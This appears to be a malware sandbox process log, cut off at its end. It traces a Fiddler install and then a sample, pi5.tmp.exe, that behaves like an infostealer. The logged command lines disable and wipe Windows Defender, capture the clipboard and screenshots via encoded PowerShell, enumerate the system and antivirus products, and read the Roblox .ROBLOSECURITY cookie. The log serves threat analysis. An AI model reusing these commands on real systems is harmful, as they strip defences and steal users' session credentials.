C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2f8 -InterruptEvent 0 -NGENProcess 2f0 -Pipe 2f4 -Comment "NGen Worker Process"6⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:4412
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 308 -InterruptEvent 0 -NGENProcess 2f0 -Pipe 30c -Comment "NGen Worker Process"6⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:964
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 210 -InterruptEvent 0 -NGENProcess 2d0 -Pipe 2f8 -Comment "NGen Worker Process"6⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:5392
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 2a8 -InterruptEvent 0 -NGENProcess 220 -Pipe 2a4 -Comment "NGen Worker Process"6⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:6928
-
-
-
C:\Users\Admin\AppData\Local\Programs\Fiddler\SetupHelper"C:\Users\Admin\AppData\Local\Programs\Fiddler\SetupHelper" /a "C:\Users\Admin\AppData\Local\Programs\Fiddler"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://fiddler2.com/r/?Fiddler2FirstRun5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4796 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x140,0x144,0x148,0x11c,0x14c,0x7ffec3f346f8,0x7ffec3f34708,0x7ffec3f347186⤵PID:2264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,8862651920909315818,5627736232958971068,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:26⤵PID:796
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,8862651920909315818,5627736232958971068,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
PID:2140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,8862651920909315818,5627736232958971068,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:86⤵PID:2856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8862651920909315818,5627736232958971068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:16⤵PID:6084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8862651920909315818,5627736232958971068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:16⤵PID:6136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8862651920909315818,5627736232958971068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:16⤵PID:812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,8862651920909315818,5627736232958971068,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:16⤵PID:7144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2236,8862651920909315818,5627736232958971068,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6076 /prefetch:86⤵PID:1292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2236,8862651920909315818,5627736232958971068,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6092 /prefetch:86⤵PID:5184
-
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5084 -childID 11 -isForBrowser -prefsHandle 7292 -prefMapHandle 4292 -prefsLen 28270 -prefMapSize 244658 -jsInitHandle 1216 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e288d1c1-06f2-4257-966a-32fb3cd6abaa} 3684 "\\.\pipe\gecko-crash-server-pipe.3684" tab3⤵PID:6320
-
-
C:\Program Files\Mozilla Firefox\crashreporter.exe"C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\minidumps\cde10db8-a31f-4f91-b17a-41c316706dde.dmp"3⤵
- Modifies registry class
PID:3268 -
C:\Program Files\Mozilla Firefox\minidump-analyzer.exe"C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\minidumps\cde10db8-a31f-4f91-b17a-41c316706dde.dmp"4⤵PID:5292
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:812
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3656
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:6448
-
C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"C:\Users\Admin\AppData\Local\Programs\Fiddler\Fiddler.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:6920 -
C:\Users\Admin\AppData\Local\Programs\Fiddler\TrustCert.exe"C:\Users\Admin\AppData\Local\Programs\Fiddler\TrustCert.exe" -noprompt -path="C:\Users\Admin\Documents\Fiddler2\FiddlerRoot.cer"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:6344
-
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL inetcpl.cpl,,42⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Modifies registry class
PID:6496
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:6984
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:5512
-
C:\Users\Admin\Downloads\pi5.tmp.exe"C:\Users\Admin\Downloads\pi5.tmp.exe"1⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1012 -
C:\Users\Admin\AppData\Local\Temp\onefile_1012_133779368131514504\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exeC:\Users\Admin\Downloads\pi5.tmp.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5184 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵PID:4860
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Loads dropped DLL
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5400
-
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All4⤵
- Deletes Windows Defender Definitions
PID:3436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:5580
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3828
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:3776
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:7132
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:6540
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:3640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Loads dropped DLL
PID:6916
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:5372
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:1488
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:6364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:7032
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2732
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:2856
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Loads dropped DLL
PID:6720 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5k13budc\5k13budc.cmdline"5⤵PID:3276
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFE0.tmp" "c:\Users\Admin\AppData\Local\Temp\5k13budc\CSCD02C1BAF89044E89245B9BE3FD53CA3.TMP"6⤵PID:5596
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2140
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3128
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:6072
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:6360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:6844
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:6656
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3220
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:5236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2264"3⤵PID:2176
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 22644⤵
- Kills process with taskkill
PID:3272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:5996
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Loads dropped DLL
- Command and Scripting Interpreter: PowerShell
PID:4500
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:5580
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Loads dropped DLL
PID:4808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:6012
-
C:\Windows\system32\getmac.exegetmac4⤵PID:5556
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:3524
-
